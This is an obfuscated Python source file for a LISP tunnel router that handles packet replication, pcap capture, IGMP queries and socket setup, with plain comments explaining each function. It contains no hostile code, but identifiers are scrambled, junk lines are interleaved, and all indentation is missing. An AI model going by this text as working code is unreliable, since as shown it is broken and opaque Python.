if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
i1IiiI1I1IIi11i1 = iIiiI1 if ( i1i1IiIiIi1Ii == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 45 - 45: ooOoO0o % o0oOOo0O0Ooo - ooOoO0o
Ooooo00o0OoO . outer_source . copy_address ( i1IiiI1I1IIi11i1 )
if 31 - 31: IiII / i11iIiiIii
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , rloc_entry = o00oO0oOo00 ,
lisp_socket = OOOO0oooo ) == False ) : return
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
if 74 - 74: O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if ( Ooooo00o0OoO . encode ( O00O0 ) == None ) : return
if ( len ( Ooooo00o0OoO . packet ) <= 1500 ) : Ooooo00o0OoO . print_packet ( "Send" , True )
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
iI1 = Ii1IIii11 if i1i1IiIiIi1Ii == 6 else OOo
Ooooo00o0OoO . send_packet ( iI1 , Ooooo00o0OoO . outer_dest )
if 14 - 14: I1ii11iIi11i
elif ( i1iiIIi11I ) :
if 49 - 49: oO0o / i1IIi % Ii1I . I1IiiI
if 93 - 93: OOooOOo
if 43 - 43: I1ii11iIi11i / I1IiiI . ooOoO0o
if 62 - 62: iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % O0 . I1Ii111
Oo0oOooOoOo = len ( Ooooo00o0OoO . packet )
for I1i in i1iiIIi11I . rle_forwarding_list :
Ooooo00o0OoO . outer_dest . copy_address ( I1i . address )
Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT if I1i . translated_port == 0 else I1i . translated_port
if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
i1i1IiIiIi1Ii = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = i1i1IiIiIi1Ii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
i1IiiI1I1IIi11i1 = iIiiI1 if ( i1i1IiIiIi1Ii == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
Ooooo00o0OoO . outer_source . copy_address ( i1IiiI1I1IIi11i1 )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "replicate"
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo ) == False ) : return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
Ooooo00o0OoO . print_packet ( "Replicate-to-L{}" . format ( I1i . level ) , True )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . outer_dest )
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
OO00OO0o0 = len ( Ooooo00o0OoO . packet ) - Oo0oOooOoOo
Ooooo00o0OoO . packet = Ooooo00o0OoO . packet [ OO00OO0o0 : : ]
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
del ( Ooooo00o0OoO )
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
o0O ( Ooo00O0o , "RTR" )
return
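#
# Worker thread body. Pulls raw packets off this thread's input queue,
# counts them, and runs them through the packet-processing function above.
#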
def I1I1iII1i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
Ooooo00o0OoO = lisp_thread . input_queue . get ( )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
lisp_thread . input_stats . increment ( len ( Ooooo00o0OoO ) )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
lisp_thread . lisp_packet . packet = Ooooo00o0OoO
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
IIIii ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 66 - 66: I1IiiI - IiII
return
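#
# Decide whether this pcap thread is the active one for the current second:
# the current time modulo the number of pcap threads selects one thread.
#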
def o00Ooo0 ( thread ) :
O0O00O = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( O0O00O ) == thread . thread_number )
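#
# Packet-capture callback. Returns early unless this pcap thread is the
# currently selected one, strips the datalink header (loopback vs. other
# interfaces), then either queues the packet to a worker thread (chosen by
# packet count) or processes it inline when no worker threads are configured.
#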
def Oo ( parms , not_used , packet ) :
if ( o00Ooo0 ( parms [ 1 ] ) == False ) : return
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
I1Iii1I = parms [ 0 ]
iIi11I = parms [ 1 ]
O0Oo = iIi11I . number_of_worker_threads
if 39 - 39: OOooOOo - OoooooooOO + Oo0Ooo
iIi11I . input_stats . increment ( len ( packet ) )
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
o0ooO0OOO = 4 if I1Iii1I == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ o0ooO0OOO : : ]
if 74 - 74: Ii1I * i11iIiiIii / I1Ii111
if 75 - 75: O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if ( O0Oo ) :
oo0 = iIi11I . input_stats . packet_count % O0Oo
oo0 = oo0 + ( len ( I11 ) - O0Oo )
i1iIIi1II1iiI = I11 [ oo0 ]
i1iIIi1II1iiI . input_queue . put ( packet )
else :
iIi11I . lisp_packet . packet = packet
IIIii ( iIi11I . lisp_packet , iIi11I . thread_name )
if 31 - 31: o0oOOo0O0Ooo % I11i + iIii1I11I1II1 + i11iIiiIii * I1Ii111
return
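#
# Packet-capture thread. Opens a live pcap session ("lo0" on macOS, "any"
# otherwise), builds a capture filter matching LISP data and control traffic
# addressed to this system's addresses (widened when 'lisp-nat = yes' is
# configured in ./lisp.config), and runs the capture loop, dispatching each
# packet to the callback above.
#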
def i1i1IiIi1 ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 22 - 22: I11i * O0 . II111iiii - OoO0O00
I1Iii1I = "lo0" if lisp . lisp_is_macos ( ) else "any"
o0Oo00OO0 = pcappy . open_live ( I1Iii1I , 9000 , 0 , 100 )
if 50 - 50: Ii1I * o0oOOo0O0Ooo % i11iIiiIii
if 96 - 96: I1ii11iIi11i + Oo0Ooo * OoO0O00 % ooOoO0o - O0
if 54 - 54: OoOoOO00 . oO0o % i11iIiiIii / OoooooooOO + IiII % oO0o
if 36 - 36: oO0o
if 74 - 74: OoooooooOO
OoOoO0O = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
OoOoO0O = ( OoOoO0O != "" and OoOoO0O [ 0 ] == " " )
if 100 - 100: O0
o00IiI1iiII1i1i = "(dst host "
i1IiI = ""
for oO00OOoO00 in lisp . lisp_get_all_addresses ( ) :
o00IiI1iiII1i1i += "{} or " . format ( oO00OOoO00 )
i1IiI += "{} or " . format ( oO00OOoO00 )
if 82 - 82: OoOoOO00
o00IiI1iiII1i1i = o00IiI1iiII1i1i [ 0 : - 4 ]
o00IiI1iiII1i1i += ") and ((udp dst port 4341 or 8472 or 4789) or "
o00IiI1iiII1i1i += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
i1IiI = i1IiI [ 0 : - 4 ]
o00IiI1iiII1i1i += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( i1IiI )
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if ( OoOoO0O ) :
o00IiI1iiII1i1i += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( i1IiI )
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
lisp . lprint ( "Capturing packets for: '{}'" . format ( o00IiI1iiII1i1i ) )
o0Oo00OO0 . filter = o00IiI1iiII1i1i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
o0Oo00OO0 . loop ( - 1 , Oo , [ I1Iii1I , lisp_thread ] )
return
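#
# Data-encapsulate an IGMP query to a gleaned EID. Looks up the (EID, group)
# map-cache entry, finds the RLE node whose name matches the EID, and sends
# the query encapsulated to that node's translated RLOC and port.
#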
def O0OOO0 ( lisp_raw_socket , eid , geid , igmp ) :
if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
Ooooo00o0OoO = lisp . lisp_packet ( igmp )
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( eid , geid )
if ( O00o0OO0000oo == None ) : return
if ( O00o0OO0000oo . rloc_set == [ ] ) : return
if ( O00o0OO0000oo . rloc_set [ 0 ] . rle == None ) : return
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
oO00o = eid . print_address_no_iid ( )
for oO0oOo0 in O00o0OO0000oo . rloc_set [ 0 ] . rle . rle_nodes :
if ( oO0oOo0 . rloc_name == oO00o ) :
Ooooo00o0OoO . outer_dest . copy_address ( oO0oOo0 . address )
Ooooo00o0OoO . encap_port = oO0oOo0 . translated_port
break
if 36 - 36: I1Ii111 . II111iiii % ooOoO0o
if 84 - 84: OoooooooOO - i11iIiiIii / iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i
if ( Ooooo00o0OoO . outer_dest . is_null ( ) ) : return
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
Ooooo00o0OoO . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . outer_version = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_ttl = 32
Ooooo00o0OoO . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
Ooooo00o0OoO . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
Ooooo00o0OoO . inner_ttl = 1
if 17 - 17: OoO0O00 * OoOoOO00
iiI111I1iIiI = lisp . green ( eid . print_address ( ) , False )
ooOoOOOOo = lisp . red ( "{}:{}" . format ( Ooooo00o0OoO . outer_dest . print_address_no_iid ( ) ,
Ooooo00o0OoO . encap_port ) , False )
ii11i = lisp . bold ( "IGMP Query" , False )
if 71 - 71: I1Ii111 / I1ii11iIi11i * iIii1I11I1II1
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( ii11i , iiI111I1iIiI , ooOoOOOOo ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Send" , True )
if 37 - 37: Oo0Ooo / IiII * O0
Ooooo00o0OoO . send_packet ( lisp_raw_socket , Ooooo00o0OoO . outer_dest )
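#
# Build a general IGMP membership query (IPv4 header plus IGMP payload,
# sourced from this RTR's RLOC, destined to 224.0.0.1) and data-encapsulate
# it to every gleaned (EID, group) pair for which lisp.lisp_allow_gleaning()
# permits IGMP querying.
#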
def IIi1ii1 ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 48 - 48: ooOoO0o / iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . OoO0O00
if 60 - 60: I1Ii111
if 98 - 98: ooOoO0o
if 34 - 34: iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
iiiii11I1 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
Ii1 = lisp . lisp_myrlocs [ 0 ]
iII1 = Ii1 . address
iiiii11I1 += chr ( ( iII1 >> 24 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 16 ) & 0xff )
iiiii11I1 += chr ( ( iII1 >> 8 ) & 0xff )
iiiii11I1 += chr ( iII1 & 0xff )
iiiii11I1 += "\xe0\x00\x00\x01"
iiiii11I1 += "\x94\x04\x00\x00"
iiiii11I1 = lisp . lisp_ip_checksum ( iiiii11I1 , 24 )
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
I1i11II = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
I1i11II = lisp . lisp_igmp_checksum ( I1i11II )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1 . store_address ( iI1ii11Ii )
i1I11IiI1iiII , o00oOo0oOoo , O0OO0OO = lisp . lisp_allow_gleaning ( o0oOO000oO0oo , i1 , None )
if ( O0OO0OO == False ) : continue
O0OOO0 ( lisp_raw_socket , o0oOO000oO0oo , i1 , iiiii11I1 + I1i11II )
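#
# Age out gleaned multicast group state. Any (EID, group) pair that has not
# been refreshed within lisp.LISP_IGMP_TIMEOUT_INTERVAL is removed from the
# gleaned-groups table.
#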
def O0O0oo ( ) :
o0oOO000oO0oo = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 83 - 83: IiII / I1Ii111
OOo000OO000 = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for iI1ii11Ii in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
OOOO00OooO = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ iI1ii11Ii ]
OOO = time . time ( ) - OOOO00OooO
if ( OOO < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
OOo000OO000 . append ( [ Ii1iIiII1ii1 , iI1ii11Ii ] )
ooooO0 = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , iI1ii11Ii in OOo000OO000 :
o0oOO000oO0oo . store_address ( Ii1iIiII1ii1 )
i1 . store_address ( iI1ii11Ii )
iiI111I1iIiI = lisp . green ( Ii1iIiII1ii1 , False )
Iiii111 = lisp . green ( iI1ii11Ii , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( iiI111I1iIiI , ooooO0 , Iiii111 ) )
lisp . lisp_remove_gleaned_multicast ( o0oOO000oO0oo , i1 )
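#
# Periodic housekeeping, re-armed every 60 seconds on a threading.Timer.
# Clears nonce-based crypto keys, times out map-cache entries, clears the
# RTR NAT trace cache, ages gleaned multicast groups, and sends IGMP queries
# to gleaned hosts.
#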
def ii1II1II ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 42 - 42: Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
for oOo0oO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for O0o in oOo0oO : del ( O0o )
if 78 - 78: OOooOOo % iIii1I11I1II1
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 50 - 50: I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
O0O0oo ( )
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
IIi1ii1 ( lisp_raw_socket )
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ lisp_raw_socket ] )
Oooo0000 . start ( )
return
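#
# RTR process startup. Determines local RLOCs (using the eth0 address on
# AWS), opens the control, IPC, trace and raw data sockets, starts the
# configured number of pcap and worker threads (LISP_PCAP_THREADS and
# LISP_WORKER_THREADS), loads the checkpoint file, and arms the periodic
# housekeeping timer.
#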
def iIIi1Ii1III ( ) :
global Oo0oO0oo0oO00 , II1iII1i , II1Ii1iI1i
global OOo , Ii1IIii11 , I11
global i111I , oO0oIIII
global iIiiI1
if 86 - 86: i11iIiiIii + i11iIiiIii . I1Ii111 % I1IiiI . ooOoO0o
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 17 - 17: Ii1I
if 67 - 67: O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
iIiiI1 = lisp . lisp_get_interface_address ( "eth0" )
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
i1iI1i = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
II1Ii1iI1i = lisp . lisp_open_listen_socket ( i1iI1i ,
str ( iiI1iIiI ) )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
i111I = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 59 - 59: IiII
II1iII1i [ 0 ] = II1Ii1iI1i
if 89 - 89: OoOoOO00 % iIii1I11I1II1
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
II1iII1i [ 2 ] = Oo0oO0oo0oO00
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
OOo = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
OOo . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
II1iII1i . append ( OOo )
oO0oIIII = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if ( lisp . lisp_is_raspbian ( ) == False ) :
Ii1IIii11 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
Ii1Ii1 = os . getenv ( "LISP_PCAP_THREADS" )
Ii1Ii1 = 1 if ( Ii1Ii1 == None ) else int ( Ii1Ii1 )
ii1IiI11I = os . getenv ( "LISP_WORKER_THREADS" )
ii1IiI11I = 0 if ( ii1IiI11I == None ) else int ( ii1IiI11I )
for i11ii in range ( Ii1Ii1 ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "pcap-{}" . format ( i11ii ) )
oOOOOO0Ooooo . thread_number = i11ii
oOOOOO0Ooooo . number_of_pcap_threads = Ii1Ii1
oOOOOO0Ooooo . number_of_worker_threads = ii1IiI11I
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = i1i1IiIi1 , args = [ oOOOOO0Ooooo ] ) . start ( )
for i11ii in range ( ii1IiI11I ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "worker-{}" . format ( i11ii ) )
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = I1I1iII1i , args = [ oOOOOO0Ooooo ] ) . start ( )
lisp . lisp_load_checkpoint ( )
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ OOo ] )
Oooo0000 . start ( )
return ( True )
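# Shutdown helper: closes the control, IPC, trace and raw sockets opened
# during startup.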
def OoIi1I1I ( ) :
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lisp-rtr" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "" )
lisp . lisp_close_socket ( i111I , "lispers.net-itr" )
OOo . close ( )
return
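# Handler for the "lisp map-resolver" configuration clause; it also appears
# to (re)start the timer that probes the configured Map-Resolvers.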
def ooOOO00oOOooO ( kv_pair ) :
global II1iII1i
global iiI1iIiI
lispconfig . lisp_map_resolver_command ( kv_pair )
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
return
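# Handler for the "lisp xtr-parameters" clause. If RLOC-probing was just
# enabled it appears to start the probe timer, then pushes the ITR crypto-port
# and the current logging settings to the data-plane via the IPC socket.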
def O00Ooo ( kv_pair ) :
global II1Ii1iI1i , OOo , iiI1iIiI
oo00ooooOOo00 = lisp . lisp_rloc_probing
lispconfig . lisp_xtr_command ( kv_pair )
if ( oo00ooooOOo00 == False and lisp . lisp_rloc_probing ) :
i1I = [ II1Ii1iI1i , II1Ii1iI1i ,
None , OOo ]
lisp . lisp_start_rloc_probe_timer ( 1 , i1I )
oO0Oo = { "type" : "itr-crypto-port" , "port" : iiI1iIiI }
lisp . lisp_write_to_dp_socket ( oO0Oo )
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
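# Command dispatch table (name obfuscated): maps each CLI/configuration
# clause to its handler plus the keywords the clause accepts, where a keyword
# entry is [value-required?, allowed values or min/max range]. For example,
# "lisp rtr-map-cache" dispatches to lispconfig.lisp_map_cache_command and
# accepts "priority" values in the 0..255 range.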
